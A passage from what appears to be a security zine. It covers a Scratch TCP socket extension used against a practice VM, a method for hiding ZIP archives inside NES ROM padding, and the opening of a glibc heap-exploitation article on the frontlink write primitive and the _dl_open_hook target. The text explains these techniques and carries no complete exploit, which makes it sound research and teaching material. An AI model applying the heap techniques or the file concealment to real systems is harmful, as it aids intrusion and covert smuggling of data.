        self.sockets[sock] = {'type': type, 'proto': proto, 'host': host,
                              'port': port, 'reading': 0, 'closed': 0}

    def set_socket(self, sock, s):
        if not self.is_connected(sock) and not self.is_listening(sock):
            print 'set_socket: socket doesn\'t exist'
            return
        self.sockets[sock]['socket'] = s

    def set_control(self, sock, c):
        if not self.is_connected(sock) and not self.is_listening(sock):
            print 'set_control: socket doesn\'t exist'
            return
        self.sockets[sock]['control'] = c

    def set_addr(self, sock, a):
        if not self.is_connected(sock) and not self.is_listening(sock):
            print 'set_addr: socket doesn\'t exist'
            return
        self.sockets[sock]['addr'] = a

    def create_socket(self, proto, sock, host, port):
        if self.is_connected(sock) or self.is_listening(sock):
            print 'create_socket: socket already in use'
            return
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        self.add_socket('socket', proto, sock, host, port)
        self.set_socket(sock, s)

    def create_listener(self, proto, sock, ip, port):
        if self.is_connected(sock) or self.is_listening(sock):
            print 'create_listener: socket already in use'
            return
        s = socket.socket()
        s.bind((ip, port))
        s.listen(5)
        self.add_socket('listener', proto, sock, ip, port)
        self.set_control(sock, s)

    def accept_connection(self, sock):
        if not self.is_listening(sock):
            print 'accept_connection: socket is not listening'
            return
        s = self.sockets[sock]['control']
        c, addr = s.accept()
        self.set_socket(sock, c)
        self.set_addr(sock, addr)

    def close_socket(self, sock):
        if self.is_connected(sock) or self.is_listening(sock):
            self.sockets[sock]['socket'].close()
            del self.sockets[sock]

    def is_connected(self, sock):
        if sock in self.sockets:
            if self.sockets[sock]['type'] == 'socket' and not self.sockets[sock]['closed']:
                return True
        return False

    def is_listening(self, sock):
        if sock in self.sockets:
            if self.sockets[sock]['type'] == 'listener':
                return True
        return False

    def write_socket(self, data, type, sock):
        if not self.is_connected(sock) and not self.is_listening(sock):
            print 'write_socket: socket doesn\'t exist'
            return
        if not 'socket' in self.sockets[sock] or self.sockets[sock]['closed']:
            print 'write_socket: socket fd doesn\'t exist'
            return
        buf = ''
        if type == "raw":
            buf = data
        elif type == "c enc":
            buf = data.decode('string_escape')
        elif type == "url enc":
            buf = urllib.unquote(data)
        elif type == "base64":
            buf = base64.b64decode(data)

        totalsent = 0
        while totalsent < len(buf):
            sent = self.sockets[sock]['socket'].send(buf[totalsent:])
            if sent == 0:
                self.sockets[sock]['closed'] = 1
                return
            totalsent += sent

    def clear_read_flag(self, sock):
        if not self.is_connected(sock) and not self.is_listening(sock):
            print 'readline_socket: socket doesn\'t exist'
            return
        if not 'socket' in self.sockets[sock]:
            print 'readline_socket: socket fd doesn\'t exist'
            return
        self.sockets[sock]['reading'] = 0

    def reading(self, sock):
        if not self.is_connected(sock) and not self.is_listening(sock):
            return 0
        if not 'reading' in self.sockets[sock]:
            return 0
        return self.sockets[sock]['reading']

    def readline_socket(self, sock):
        if not self.is_connected(sock) and not self.is_listening(sock):
            print 'readline_socket: socket doesn\'t exist'
            return
        if not 'socket' in self.sockets[sock] or self.sockets[sock]['closed']:
            print 'readline_socket: socket fd doesn\'t exist'
            return
        self.sockets[sock]['reading'] = 1
        str = ''
        c = ''
        while c != '\n':
            read_sockets, write_s, error_s = select.select(
                [self.sockets[sock]['socket']], [], [], 0.1)
            if read_sockets:
                c = self.sockets[sock]['socket'].recv(1)
                str += c
                if c == '':
                    self.sockets[sock]['closed'] = 1
                    c = '\n'  # end the while loop
            else:
                c = '\n'  # end the while loop with empty or partially received string
        self.sockets[sock]['readbuf'] = str
        if str:
            self.sockets[sock]['reading'] = 2
        else:
            self.sockets[sock]['reading'] = 0

    def recv_socket(self, length, sock):
        if not self.is_connected(sock) and not self.is_listening(sock):
            print 'recv_socket: socket doesn\'t exist'
            return
        if not 'socket' in self.sockets[sock] or self.sockets[sock]['closed']:
            print 'recv_socket: socket fd doesn\'t exist'
            return
        self.sockets[sock]['reading'] = 1
        read_sockets, write_s, error_s = select.select(
            [self.sockets[sock]['socket']], [], [], 0.1)
        if read_sockets:
            str = self.sockets[sock]['socket'].recv(length)
            if str == '':
                self.sockets[sock]['closed'] = 1
        else:
            str = ''

        self.sockets[sock]['readbuf'] = str
        if str:
            self.sockets[sock]['reading'] = 2
        else:
            self.sockets[sock]['reading'] = 0

    def n_read(self, sock):
        if not self.is_connected(sock) and not self.is_listening(sock):
            return 0
        if self.sockets[sock]['reading'] == 2:
            return len(self.sockets[sock]['readbuf'])
        else:
            return 0

    def readbuf(self, type, sock):
        if not self.is_connected(sock) and not self.is_listening(sock):
            return ''
        if self.sockets[sock]['reading'] == 2:
            data = self.sockets[sock]['readbuf']
            buf = ''
            if type == "raw":
                buf = data
            elif type == "c enc":
                buf = data.encode('string_escape')
            elif type == "url enc":
                buf = urllib.quote(data)
            elif type == "base64":
                buf = base64.b64encode(data)
            return buf
        else:
            return ''
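
The read path above relies on select with a short timeout so that a Scratch command never blocks forever. A minimal Python 3 sketch of the same idea follows; it is not part of the extension, and the function name read_line plus the use of socket.socketpair() as a stand-in for a real connection are assumptions made for the demonstration.

```python
import select
import socket


def read_line(sock, timeout=0.1):
    """Read until newline, peer close, or `timeout` seconds of silence.

    Returns (data, closed) where `closed` is True if the peer shut down.
    """
    buf = b''
    closed = False
    while not buf.endswith(b'\n'):
        readable, _, _ = select.select([sock], [], [], timeout)
        if not readable:
            break              # nothing arrived in time: return what we have
        c = sock.recv(1)
        if c == b'':
            closed = True      # orderly shutdown by the peer
            break
        buf += c
    return buf, closed


# A connected pair of local sockets stands in for a real TCP connection.
a, b = socket.socketpair()
b.sendall(b'hello\nwor')
line1 = read_line(a)   # a complete line
line2 = read_line(a)   # a partial line, ended by the timeout
b.close()
line3 = read_line(a)   # nothing left, and the peer has gone away
a.close()
```

The three calls correspond to the three states the extension reports through its read flag and closed marker: a full line, a partial read, and a closed socket.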

The final section is simply the description of the blocks that the extension makes available over the web service to Scratch. Each block line takes 4 arguments: the Python function to call, the type of block (command, predicate or reporter), the text description that the Scratch block will present (how it will look in Scratch), and the default values. For reference, predicates are simply reporter blocks that only return a boolean value.

The text description includes placeholders for the arguments to the Python function: %s for a string, %n for a number, and %m for a drop-down menu. All %m arguments are post-fixed with the name of the menu from which the available values are taken. The actual menus are described as a dictionary of named lists.

Finally, the object is linked to the description and the web service is then started. This Python script is launched from the command line and will start the web service on the given port.

descriptor = Descriptor(
    name = "Scratch Sockets",
    port = 5000,
    blocks = [
        Block('create_socket', 'command',
              'create %m.proto conx %m.sockno host %s port %n',
              defaults=["tcp", 1, "127.0.0.1", 0]),
        Block('create_listener', 'command',
              'create %m.proto listener %m.sockno ip %s port %n',
              defaults=["tcp", 1, "0.0.0.0", 0]),
        Block('accept_connection', 'command', 'accept connection %m.sockno',
              defaults=[1]),
        Block('close_socket', 'command', 'close socket %m.sockno',
              defaults=[1]),
        Block('is_connected', 'predicate', 'socket %m.sockno connected?'),
        Block('is_listening', 'predicate', 'socket %m.sockno listening?'),
        Block('write_socket', 'command',
              'write %s as %m.encoding to socket %m.sockno',
              defaults=["hello", "raw", 1]),
        Block('readline_socket', 'command', 'readline from socket %m.sockno',
              defaults=[1]),
        Block('recv_socket', 'command', 'read %n bytes from socket %m.sockno',
              defaults=[255, 1]),
        Block('n_read', 'reporter', 'n_read from socket %m.sockno',
              defaults=[1]),
        Block('readbuf', 'reporter',
              'received buf as %m.encoding from socket %m.sockno',
              defaults=["raw", 1]),
        Block('reading', 'reporter', 'read flag for socket %m.sockno',
              defaults=[1]),
        Block('clear_read_flag', 'command', 'clear read flag for socket %m.sockno',
              defaults=[1]),
    ],
    menus = dict(
        proto = ["tcp", "udp"],
        encoding = ["raw", "c enc", "url enc", "base64"],
        sockno = [1, 2, 3, 4, 5],
    ),
)

extension = Extension(SSocket, descriptor)

if __name__ == '__main__':
    extension.run_forever(debug=True)
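
To make the placeholder convention concrete, here is a small Python 3 sketch that pulls the argument list out of a block's text description. It only illustrates the %s / %n / %m.menu notation described in the text; parse_spec is a hypothetical helper, and this is not how blockext itself parses descriptions.

```python
import re

# Placeholder letters as described in the text.
KINDS = {'s': 'string', 'n': 'number', 'm': 'menu'}


def parse_spec(spec):
    """Return one (kind, menu_name) pair per placeholder, in order."""
    args = []
    # %s and %n stand alone; %m is followed by '.' and the menu's name.
    for kind, menu in re.findall(r'%([snm])(?:\.(\w+))?', spec):
        args.append((KINDS[kind], menu or None))
    return args


parsed = parse_spec('write %s as %m.encoding to socket %m.sockno')
```

The order of the placeholders is the order of the Python function's arguments, which is why write_socket takes (data, type, sock) in that sequence.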

Linking into Scratch

The web service provides the required web service description file from its index page. Simply browse to http://localhost:5000 and download the Scratch 2 extension file (Scratch Scratch Sockets English.s2e). To load this into Scratch we need to use the super-secret 'shift click' on the File menu to reveal the 'Import experimental HTTP extension' option. Navigate to the s2e file and the new blocks will appear under 'More Blocks'.

Fuzzing, crashing, controlling EIP, and exploiting

In order to demonstrate the use of the extension, I obtained and booted the TinySploit VM from Saumil Shah's ExploitLab, and then used the given stack-based overflow to gain remote code execution. The details are straightforward; the shell code by Julien Ahrens came from ExploitDB and was modified to execute Busybox correctly.8 Scratch projects are available as an attachment to this PDF.9

Scratch is a great language/IDE to teach coding to children. Once they've successfully built a racing game and a PacMan clone, it can also be used to teach them to interact with the world outside of Scratch. As I mentioned in the introduction, we've interfaced Scratch to Midi and Arduino projects from where a whole world opens up. The above screen shots show how it can also be interfaced to a simple TCP/IP socket extension to allow interaction with anything on the network.

From here it is possible to cause buffer overflows that lead to crashes and, through standard stack-smashing techniques, to remote code execution. When I was a child, Z-80 assembly was the second language I learned after BASIC on a ZX Spectrum. (The third was 8086 funnily enough!) I hunted for infinite lives and eventually became a reasonable C programmer. Perhaps with a (slightly better) socket extension, Scratch could become a gateway to x86 shell code. I wonder whether IT teachers would agree?

-- Kev Sheldrake

8 https://www.exploit-db.com/exploits/43755/
9 unzip pocorgtfo18.pdf scratchexploits.zip

18:04 Concealing ZIP Files in NES Cartridges
by Vi Grey

Hello, neighbors.

This story begins with the fantastic work described in PoC||GTFO 14:12, which presented an NES ROM that was also a PDF. That file, pocorgtfo14.pdf, was by coincidence also a ZIP file. That issue inspired me to learn 6502 Assembly, develop an NES game from scratch, and burn it onto a physical cartridge for the #tymkrs.

During development, I noticed that the unused game space was just being used as padding and that any data could be placed in that padding. Although I ended up using that space for something else in the game, I realized that I could use padding space to make an NES ROM that is also a ZIP file. This polyglot file wouldn't make the NES ROM any bigger than it originally was. I quickly got to work on this idea.

The method described in this article to create an NES + ZIP polyglot file is different from that which was used in PoC||GTFO 14:12. In that method, none of the ZIP file data is saved inside the NES ROM itself. My method is able to retain the ZIP file data, even when it is burned onto a cartridge. If you rip the data off of a cartridge, the resulting NES ROM file will still be an NES + ZIP polyglot file.

Numbers and ranges included in figures in this article will be in Hexadecimal. Range values are big-endian and ranges work the same as Python slices, where [x:y] is the range of x to, but not including, y.

iNES File Format

This article focuses on the iNES file format. This is because, as was described in PoC||GTFO 14:12, iNES is essentially the de facto standard for NES ROM files. Figure 8 shows the structure of an NES ROM in the iNES file format that fits on an NROM-128 cartridge.10

The first sixteen bytes of the file MUST be the iNES Header, which provides information for NES Emulators to figure out how to play the ROM.

Following the iNES Header is the 16 KiB PRG ROM. If the PRG ROM data doesn't fill up that entire 16 KiB, then the PRG ROM will be padded. As long as the PRG padding isn't actually being used, it can be any byte value, as that data is completely ignored. The final six bytes of the PRG ROM data are the interrupt vectors, which are required.

Eight kilobytes of CHR ROM data follows the PRG ROM.

Start of iNES File


iNES Header [0000:0010]

PRG ROM [0010:4010]

PRG Padding [XXxx:400A]

PRG Interrupt Vectors [400A:4010]

CHR ROM [4010:6010]

Figure 8. iNES File Format
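
The ranges in Figure 8 follow directly from the region sizes, and since they already use Python slice semantics they can be checked with a few lines of Python 3. This is a sketch for the NROM-128 case only; the constant and function names are illustrative, not taken from any tool.

```python
HEADER_SIZE = 0x10     # iNES header
PRG_SIZE = 0x4000      # 16 KiB PRG ROM on NROM-128
CHR_SIZE = 0x2000      # 8 KiB CHR ROM
VECTORS_SIZE = 6       # three 2-byte interrupt vectors ending the PRG ROM


def ines_layout():
    """Return {region: (start, end)} with end exclusive, as in Figure 8."""
    prg_start = HEADER_SIZE
    prg_end = prg_start + PRG_SIZE
    return {
        'header': (0, HEADER_SIZE),
        'prg': (prg_start, prg_end),
        'vectors': (prg_end - VECTORS_SIZE, prg_end),
        'chr': (prg_end, prg_end + CHR_SIZE),
    }


def split_rom(rom):
    """Slice an iNES file (bytes) into its regions."""
    return {name: rom[a:b] for name, (a, b) in ines_layout().items()}


layout = ines_layout()
parts = split_rom(bytes(0x6010))   # an all-zero stand-in for a real ROM
```

The 'prg' and 'chr' slices are the two images that end up on the cartridge; the header exists only in the file.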


10 NROM-128 is a board that does not use a mapper and only allows a PRG ROM size of 16 KiB.

ZIP File Format

There are two things in the ZIP file format that we need to focus on to create this polyglot file, the End of Central Directory Record and the Central Directory File Headers.

End of Central Directory Record

To find the data of a ZIP file, a ZIP file extractor should start searching from the back of the file towards the front until it finds the End of Central Directory Record. The parts we care about are shown in Figure 9.

The End of Central Directory Record begins with the four-byte big-endian signature 504B0506.

Twelve bytes after the end of the signature is the four-byte Central Directory Offset, which states how far from the beginning of the file the start of the Central Directory will be found.

The following two bytes state the ZIP file comment length, which is how many bytes of ZIP file comment follow the ZIP file data. Two bytes for the comment length means we have a maximum length value of 65,535 bytes, more than enough space to make our polyglot file.

Start of End of Central Directory Record

End of Central Directory Record Signature (504B0506)  [0000:0004]
...                                                   [0004:0010]
Central Directory Offset                              [0010:0014]
Comment Length (L)                                    [0014:0016]
ZIP File Comment                                      [0016:0016 + L]

Figure 9. End of Central Directory Record Format

Central Directory File Headers

For every file or directory that is zipped in the ZIP file, a Central Directory File Header exists. The parts we care about are shown in Figure 10.

Each Central Directory File Header starts with the four-byte big-endian signature 504B0102.

38 bytes after the signature is a four-byte Local Header Offset, which specifies how far from the beginning of the file the corresponding local header is.

Start of a Central Directory File Header

Central Directory File Header Signature (504B0102)    [0000:0004]
...                                                   [0004:002A]
Local Header Offset                                   [002A:002E]
...                                                   [002E:]

Figure 10. Central Directory File Header Format
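
The backward search and the two fields we care about can be tried out with a short Python 3 sketch. The function name find_eocd is made up for this example, and the search is deliberately naive: it assumes the signature bytes do not also occur inside the ZIP file comment, which a careful extractor would have to rule out.

```python
import io
import struct
import zipfile

EOCD_SIG = b'PK\x05\x06'   # 504B0506


def find_eocd(data):
    """Return (record position, Central Directory Offset, comment length)."""
    pos = data.rfind(EOCD_SIG)          # search from the back of the file
    if pos < 0:
        raise ValueError('no End of Central Directory Record found')
    # Both fields are little-endian: 4 bytes at 0x10, then 2 bytes at 0x14.
    cd_offset, comment_len = struct.unpack_from('<IH', data, pos + 0x10)
    return pos, cd_offset, comment_len


# Build a tiny ZIP file in memory to try it on.
buf = io.BytesIO()
with zipfile.ZipFile(buf, 'w') as z:
    z.writestr('hello.txt', 'hello, neighbors')
    z.comment = b'abc'
data = buf.getvalue()

pos, cd_offset, comment_len = find_eocd(data)
first_header_sig = data[cd_offset:cd_offset + 4]   # a Central Directory File Header
```

Following cd_offset lands on the first Central Directory File Header, whose own signature is 504B0102.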


11 unzip pocorgtfo18.pdf APPNOTE.TXT

Miscellaneous ZIP File Fun

Five bytes into each Central Directory File Header is a byte that determines which Host OS the file attributes are compatible for.

The document, "APPNOTE.TXT - .ZIP File Format Specification" by PKWARE, Inc., specifies what Host OS goes with which decimal byte value.11 I included a list of hex byte values for each Host OS below.

    00 - MS-DOS and OS/2
    01 - Amiga
    02 - OpenVMS
    03 - UNIX
    04 - VM/CMS
    05 - Atari ST
    06 - OS/2 H.P.F.S.
    07 - Macintosh
    08 - Z-System
    09 - CP/M
    0A - Windows NTFS
    0B - MVS (OS/390 - Z/OS)
    0C - VSE
    0D - Acorn Risc
    0E - VFAT
    0F - Alternate MVS
    10 - BeOS
    11 - Tandem
    12 - OS/400
    13 - OS/X (Darwin)
    (14-FF) - Unused

Although 0A is specified for Windows NTFS and 0B is specified for MVS (OS/390 - Z/OS), I kept getting the Host OS value of TOPS-20 when I used 0A and NTFS when I used 0B.

I ended up deciding to set the Host OS for all of the Central Directory File Headers to Atari ST. With that said, I have tested every Host OS value from 00 to FF on this file and it extracted properly for every value. Different Host OS values may produce different read, write, and execute values for the extracted files and directories.

iNES + ZIP File Format

With this information about iNES files and ZIP files, we can now create an iNES + ZIP polyglot file, as shown in Figure 11.

Start of iNES + ZIP Polyglot File

iNES Header                 [0000:0010]
PRG ROM                     [0010:4010]
PRG Padding                 [XXxx:YYyy]
ZIP File Data               [YYyy:400A]
Comment Length (0620)       [4008:400A]
PRG Interrupt Vectors       [400A:4010]
CHR ROM                     [4010:6010]

Figure 11. iNES + ZIP Polyglot File Format

Here, the first sixteen bytes of the file continue to be the same iNES header as before.

The PRG ROM still starts in the same location. Somewhere in the PRG Padding an amount of bytes equal to the length of the ZIP file data is replaced with the ZIP file data. The ZIP file data starts at hex offset YYyy and ends right before the PRG Interrupt Vectors. This ZIP file data MUST be smaller than or equal to the size of the PRG Padding to make this polyglot file.

Local Header Offsets and the Central Directory Offset of the ZIP file data are updated by adding the little-endian hex value yyYY to them and the ZIP file comment length is set to the little-endian hex value 0620 (8,198 in Decimal, or 2006 read as a big-endian number), which is the length of the PRG Interrupt Vectors (6 bytes) plus the CHR ROM (8 KiB).

PRG Interrupt Vectors and CHR ROM data remain unmodified, so they are still the same as before.

Because the iNES header is the same, the PRG and CHR ROM are still the correct size, and none of the required PRG ROM data or any of the CHR ROM data were modified, this file is still a completely standard NES ROM. The NES ROM file does not change in size, so there is no extra "garbage data" outside of the NES ROM file as far as NES emulators are concerned.

With the ZIP file offsets being updated and all data after the ZIP file data being declared as a ZIP file comment, this file is a standard ZIP file that your ZIP file extractor will be able to properly extract.12

12 The only ZIP file extractor I have gotten any warnings from with this polyglot file was 7-Zip for Windows specifically, with the warning, "The archive is open with offset." The polyglot file still extracted properly.
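
The patching steps described above can be sketched in Python 3 as follows. This is not the author's build tool, just a minimal illustration under some assumptions: the ROM is exactly the NROM-128 size from Figure 8, the bytes being overwritten really are unused padding, and the input ZIP has no comment of its own and is small enough to need no ZIP64 records. The name embed_zip is hypothetical.

```python
import io
import struct
import zipfile

VECTORS = 0x400A     # start of the PRG Interrupt Vectors
ROM_SIZE = 0x6010    # header + 16 KiB PRG ROM + 8 KiB CHR ROM


def embed_zip(rom, zip_data):
    """Overwrite padding so the ZIP data ends right before the vectors."""
    assert len(rom) == ROM_SIZE
    start = VECTORS - len(zip_data)          # hex offset YYyy in Figure 11
    assert start >= 0x10, 'ZIP data does not fit in the PRG ROM'
    z = bytearray(zip_data)
    eocd = z.rfind(b'PK\x05\x06')
    assert eocd >= 0 and eocd + 0x16 == len(z), 'expects a ZIP without comment'
    entries, = struct.unpack_from('<H', z, eocd + 0x0A)
    cd_offset, = struct.unpack_from('<I', z, eocd + 0x10)
    # Shift the Local Header Offset in every Central Directory File Header.
    p = cd_offset
    for _ in range(entries):
        assert z[p:p + 4] == b'PK\x01\x02'
        name_len, extra_len, comment_len = struct.unpack_from('<HHH', z, p + 0x1C)
        local, = struct.unpack_from('<I', z, p + 0x2A)
        struct.pack_into('<I', z, p + 0x2A, local + start)
        p += 0x2E + name_len + extra_len + comment_len
    # Shift the Central Directory Offset as well.
    struct.pack_into('<I', z, eocd + 0x10, cd_offset + start)
    # Declare everything after the ZIP data (vectors + CHR ROM) a comment.
    struct.pack_into('<H', z, eocd + 0x14, ROM_SIZE - VECTORS)
    out = bytearray(rom)
    out[start:VECTORS] = z
    return bytes(out)


# Try it on an all-zero stand-in ROM and a one-file ZIP.
buf = io.BytesIO()
with zipfile.ZipFile(buf, 'w') as zf:
    zf.writestr('secret.txt', 'hello, neighbors')
rom = bytes(ROM_SIZE)
poly = embed_zip(rom, buf.getvalue())
extracted = zipfile.ZipFile(io.BytesIO(poly)).read('secret.txt')
```

The result has the same length as the input ROM, and Python's own zipfile module opens it directly because every offset now counts from the start of the combined file.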

NES Cartridge
The PRG and CHR ROMs of this polyglot file can
be burned onto EPROMs and put on an NROM-
128 board to make a completely functioning NES
cartridge.
Ripping the NES ROM from the cartridge and
turning it back into an iNES file will result in the file
being a NES + ZIP polyglot file again. It is there-
fore possible to sneak a secret ZIP file to someone
via a working NES cartridge.
Don’t be surprised if that crappy bootleg copy of
Tetris I give you is also a ZIP file containing secret
documents!

Source Code
This NES + ZIP polyglot file is a quine.13 Unzip
it and the extracted files will be its source code.14
Compile that source code and you’ll create another
NES + ZIP polyglot file quine that can then be un-
zipped to get its source code.
I was able to make this file contain its own source
code because the source code itself was quite small
and highly compressible in a ZIP file.

13 unzip pocorgtfo18.pdf neszip-example.nes


14 unzip neszip-example.nes

18:05 House of Fun; or,
Heap Exploitation against GlibC in 2018
by Yannay Livneh

GlibC's malloc implementation is a gift that keeps on giving. Every now and then someone finds a way to turn it on its head and execute arbitrary code. Today is one of those days. Today, dear neighbor, you will see yet another path to code execution. Today you will see how you can overwrite arbitrary memory addresses (yes, more than one!) with a pointer to your data. Today you will see the perfect gadget that will make the code of your choosing execute. Welcome to the House of Fun.

The History We Were Taught

The very first heap exploitation techniques were publicly introduced in 2001. Two papers in Phrack 57, Vudo Malloc Tricks15 and Once Upon a Free16, explained how corrupted heap chunks can lead to full compromise. They presented methods that abused the linked list structure of the heap in order to gain some write primitives. The best known technique introduced in these papers is the unlink technique, attributed to Solar Designer. It is quite well known today, but let's explain how it works anyway. In a nutshell, deletion of a controlled node from a linked list leads to a write-what-where primitive.

Consider this simple implementation of list deletion:

    void list_delete(node_t *node) {
        node->fd->bk = node->bk;
        node->bk->fd = node->fd;
    }

This is roughly equivalent to:

    prev = node->bk;
    next = node->fd;
    *(next + offsetof(node_t, bk)) = prev;
    *(prev + offsetof(node_t, fd)) = next;

So, an attacker in control of fd and bk can write the value of bk to (somewhat after) fd and vice versa.

This is why, in late 2004, a series of patches to GNU libc malloc implemented over a dozen mandatory integrity assertions, effectively rendering the existing techniques obsolete. If the previous sentence sounds familiar, this is not a coincidence, as it is a quote from the famous Malloc Maleficarum.17

This paper was published in 2005 and was immediately regarded as a classic. It described five new heap exploitation techniques. Some, like previous techniques, exploited the structure of the heap, but others introduced a new capability: allocating arbitrary memory. These newer techniques exploited the fact that malloc is a memory allocator, returning memory for the caller to use. By corrupting various fields used by the allocator to decide which memory to allocate (the chunk's size and pointers to subsequent chunks), exploiters tricked the allocator to return addresses in the stack, .got, or other places.

Over time, many more integrity checks were added to glibc. These checks try to make sure the size of a chunk makes sense before allocating it to the user, and that it's in a reasonable memory region. It is not perfect, but it helped to some degree.

Then, hackers came up with a new idea. While allocating memory anywhere in the process's virtual space is a very strong primitive, many times it's sufficient to just corrupt other data on the heap, in neighboring chunks. By corrupting the size field or even just the flags in the size field, it's possible to corrupt the chunk in such a way that makes the heap allocate a chunk which overlaps another chunk with data the exploiter wants to control. A couple of techniques which demonstrate it were published in recent years, most notably Chris Evans' The poisoned NUL byte, 2014 edition.18

To mitigate against these kinds of attacks, another check was added. The size of a freed chunk is written twice, once in the beginning of the chunk and again at its end. When the allocator makes a decision based on the chunk's size, it verifies that both sizes agree. This isn't bulletproof, but it helps.

The most up-to-date repository of currently usable techniques is maintained by the Shellphish CTF team in their how2heap GitHub repository.19

15 unzip pocorgtfo18.pdf vudo.txt # Phrack 57:8
16 unzip pocorgtfo18.pdf onceuponafree.txt # Phrack 57:9
17 unzip pocorgtfo18.pdf MallocMaleficarum.txt
18 https://googleprojectzero.blogspot.com/2014/08/
19 git clone https://github.com/shellphish/how2heap || unzip pocorgtfo18.pdf how2heap.zip

A Brave New Primitive

Sometimes, in order to take two steps forward we must first take one step back. Let's travel back in time and examine the structure of the heap like they did in 2001. The heap internally stores chunks in doubly linked lists. We already discussed list deletion, how it can be used for exploitation, and the fact it's been mitigated for many years. But list deletion (unlinking) is not the only list operation! There is another operation: insertion.

Consider the following code:

    void list_insert_after(node_t *prev, node_t *node) {
        node->bk = prev;
        node->fd = prev->fd;

        prev->fd->bk = node;
        prev->fd = node;
    }

The line before the last roughly translates to:

    next = prev->fd;
    *(next + offsetof(node_t, bk)) = node;

An attacker in control of prev->fd can write the inserted node address wherever she desires!

Having this control is quite common in the case of heap-based corruptions. Using a Use-After-Free or a Heap-Based-Buffer-Overflow, the attacker commonly controls the chunk's fd (forward pointer). Note also that the data written is not arbitrary. It's an address of the inserted node, a chunk on the heap which may be allocated back to the user, or might still be in the user's control! So this is not only a write-where primitive, it's more of a write-pointer-to-what-where.

Looking at malloc's code, this primitive can be quite easily employed. Insertion into lists happens when a freed chunk is inserted into a large bin. But more about this later. Before diving into the details of how to use it, there are some issues we need to clear first.

When I started writing this paper, after understanding the categorization of techniques I described earlier, an annoying doubt popped into my mind. The primitive I found in malloc's code is very much connected to the old unlink primitive; they are literally counterparts. How come no one had found and published it in the early years of heap exploitation? And if someone had, how come neither I nor any of my colleagues I discussed it with had ever heard of it?

So I sat down and read the early papers, the ones from 2001 that everyone says contain only obsolete and mitigated techniques. And then I learned, lo and behold, it had been found many years ago!

History of the Forgotten Frontlink

The list insertion primitive described in the previous section is in fact none other than the frontlink technique. This technique is the second one described in Vudo Malloc Tricks, the very first paper about heap exploitation from 2001. (Part 3.6.2.)

In the paper, the author says it is "less flexible and more difficult to implement" in comparison to the unlink technique. It is far inferior in a world with no NX bit (DEP), as it writes a value the attacker does not fully control, whereas the unlink technique enables the attacker to control the written data (as long as it's a writable address). I believe that for this reason the frontlink method was less popular. And so, it has almost been completely forgotten.

In 2002, malloc was re-written as an adaptation of Doug Lea's malloc-2.7.0.c. This re-write refactored the code and removed the frontlink macro, but basically does the same thing upon list insertion. From this year onward, there is no way to attribute the name frontlink with the code the technique is exploiting.

In 2003, William Robertson, et al., announced a new system that "detects and prevents all heap overflow exploits" by using some kind of cookie-based detection. They also announced it in the security focus mailing list.20 One of the more interesting responses to this announcement was from Stefan Esser, who described his private mitigation for the same problem. This solution is what we now know as "safe unlinking."
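
Both list primitives from the sections above, deletion and insertion, can be played with safely in a toy memory model. The following Python 3 sketch is only a simulation: memory is a dictionary of word-sized cells, the field offsets OFF_FD and OFF_BK are an assumed node layout, and all addresses are arbitrary numbers chosen for the demonstration. It has nothing to do with glibc's real chunk layout or checks.

```python
from collections import defaultdict

OFF_FD, OFF_BK = 0, 1      # word offsets of fd and bk inside a node (assumed)


def list_delete(mem, node):
    fd, bk = mem[node + OFF_FD], mem[node + OFF_BK]
    mem[fd + OFF_BK] = bk                     # node->fd->bk = node->bk
    mem[bk + OFF_FD] = fd                     # node->bk->fd = node->fd


def list_insert_after(mem, prev, node):
    mem[node + OFF_BK] = prev                 # node->bk = prev
    mem[node + OFF_FD] = mem[prev + OFF_FD]   # node->fd = prev->fd
    mem[mem[prev + OFF_FD] + OFF_BK] = node   # prev->fd->bk = node
    mem[prev + OFF_FD] = node                 # prev->fd = node


TARGET, VALUE = 0x1000, 0x2000

# unlink: the attacker controls fd and bk of the node being deleted.
mem = defaultdict(int)
NODE = 0x3000
mem[NODE + OFF_FD] = TARGET - OFF_BK          # so that fd->bk is TARGET
mem[NODE + OFF_BK] = VALUE
list_delete(mem, NODE)
unlink_written = mem[TARGET]                  # write-what-where
unlink_mirror = mem[VALUE + OFF_FD]           # the "vice versa" write

# insertion: the attacker controls only prev->fd.
mem2 = defaultdict(int)
PREV, NEW = 0x4000, 0x5000
mem2[PREV + OFF_FD] = TARGET - OFF_BK
list_insert_after(mem2, PREV, NEW)
insert_written = mem2[TARGET]                 # write-pointer-to-what-where
```

In the deletion case the attacker picks the value that lands at TARGET, at the price of a second, mirrored write. In the insertion case the value is not chosen freely: it is always the address of the inserted node.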
20 https://www.securityfocus.com/archive/1/346087/30/0/

Robertson says that it only prevents unlink attacks, to which Esser responds:

    I know that modifying unlink does not protect against frontlink attacks. But most heap exploiters do not even know that there is anything else than unlink.

Following this correspondence, in late 2004, the safe unlinking mitigation was added to malloc’s code.

In 2005, the Malloc Maleficarum was published. Here is the first paragraph from the paper:

    In late 2001, “Vudo Malloc Tricks” and “Once Upon A free()” defined the exploitation of overflowed dynamic memory chunks on Linux. In late 2004, a series of patches to GNU libc malloc implemented over a dozen mandatory integrity assertions, effectively rendering the existing techniques obsolete.

Every paper that followed it and accounted for the history of heap exploits has the same narrative. In Malloc Des-Maleficarum,21 Blackeng states:

    The skills published in the first one of the articles, showed:
    - unlink () method.
    - frontlink () method.
    . . . these methods were applicable until the year 2004, when the GLIBC library was patched so those methods did not work.

And in Yet Another Free Exploitation Technique,22 Huku states:

    The idea was then adopted by glibc-2.3.5 along with other sanity checks thus rendering the unlink() and frontlink() techniques useless.

I couldn’t find any evidence that supports these assertions. On the contrary, I managed to successfully employ the frontlink technique on various platforms from different years, including Fedora Core 4 from early 2005 with glibc 2.3.5 installed. The code is presented later in this paper.

In conclusion, the frontlink technique never gained popularity. There is no way to link the name frontlink to any existing code, and all relevant papers claim it’s useless and a waste of time. However, it works in practice today and on every machine I checked.

Back To Completing Exploitation

At this point you might think this write-pointer-to-what-where primitive is nice, but there is still a lot of work to do to get control over a program’s flow. We need to find a suitable pointer to overwrite, one which points to a struct that contains function pointers. Then we can trigger this indirect function call. Surprisingly, this turns out to be rather easy. Glibc itself has some pointers which fit perfectly for this primitive. Among some other pointers, the most suitable for our needs is the _dl_open_hook. This hook is used when loading a new library. In this process, if this hook is not NULL, _dl_open_hook->dlopen_mode() is invoked, and its target can very much be in the attacker’s control!

As for the requirement of loading a library, fear not! The allocator itself does it for us when an integrity check fails. So all an attacker needs to do is to fail an integrity check after overwriting _dl_open_hook and enjoy her shell.23

That’s it for theory. Let’s see how we can make it happen in the actual implementation!

The Gory Internals of Malloc

First, a short recollection of the allocator’s internals.

